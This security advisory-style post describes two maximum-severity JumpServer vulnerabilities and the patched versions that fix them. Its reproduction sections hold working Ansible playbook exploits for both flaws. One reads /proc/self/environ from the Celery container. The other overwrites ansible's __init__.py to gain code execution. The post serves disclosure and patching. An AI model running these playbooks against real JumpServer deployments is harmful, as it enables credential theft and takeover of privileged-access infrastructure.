CVE-2024-40628 & CVE-2024-40629: Two Maximum Severity Flaws in JumpServer

CVE-2024-40628 and CVE-2024-40629

JumpServer, a widely used open-source privileged access management (PAM) tool, has disclosed two critical vulnerabilities that could allow attackers to gain unauthorized access to sensitive systems and data. The vulnerabilities, identified as CVE-2024-40628 and CVE-2024-40629, both carry a CVSS score of 10, the highest possible severity rating.

Exploiting the Flaws

CVE-2024-40628 enables attackers to read arbitrary files within the JumpServer Celery container, potentially exposing sensitive information such as passwords, SSH keys, and database credentials. This vulnerability can be exploited by a low-privileged user with access to the Job Center feature.

Reproduction Steps:

  1. Open Workbench > Job > Template section, create a malicious playbook template with the following content:
    - hosts: all
    tasks:
    - name: read file from local host = celery using file lookup plugin
    ansible.builtin.debug:
    msg: "{{ lookup('ansible.builtin.file', '/proc/self/environ') }}"
  2. Open Workbench > Job > Job list section, create a new job with the playbook template created above.
  3. Run the job

CVE-2024-40629 is even more severe, allowing attackers to write arbitrary files and execute code within the Celery container. This could lead to a complete compromise of the JumpServer instance and the systems it manages. Like CVE-2024-40628, this vulnerability can also be exploited by a low-privileged user with access to the Job Center.

Reproduction Steps:

  1. Open Workbench > Job > Template section, create a malicious playbook template with the following content:
     - hosts: all
    tasks:
    - name: create python file on remote host that executes a command
    shell: |
    echo 'from ansible.release import __version__, __author__
    __import__("os").system("id > /tmp/pwnd")' > /tmp/rce
    - name: write that file at a known location that gets reloaded at the next
    ansible execution
    fetch:
    src: /tmp/rce
    dest: /opt/py3/lib/python3.11/site-packages/ansible/__init__.py
    flat: true
  2. Open Workbench > Job > Job list section, create a new job with the playbook template created above.
  3. Run the job, then run any other playbook and the command will be executed

Impact on Organizations

If exploited, these vulnerabilities could have devastating consequences for organizations that rely on JumpServer to manage privileged access to their critical systems. Attackers could steal sensitive data, disrupt operations, or even launch further attacks on other systems within the organization.

Who is Affected?

All JumpServer versions from v3.0.0 to v3.10.11 are vulnerable to both CVE-2024-40628 and CVE-2024-40629.

Mitigating the Risk

JumpServer has released patched versions v3.10.12 and v4.0.0 that address these vulnerabilities. All organizations using JumpServer are strongly urged to update to one of these patched versions immediately.

Related Posts: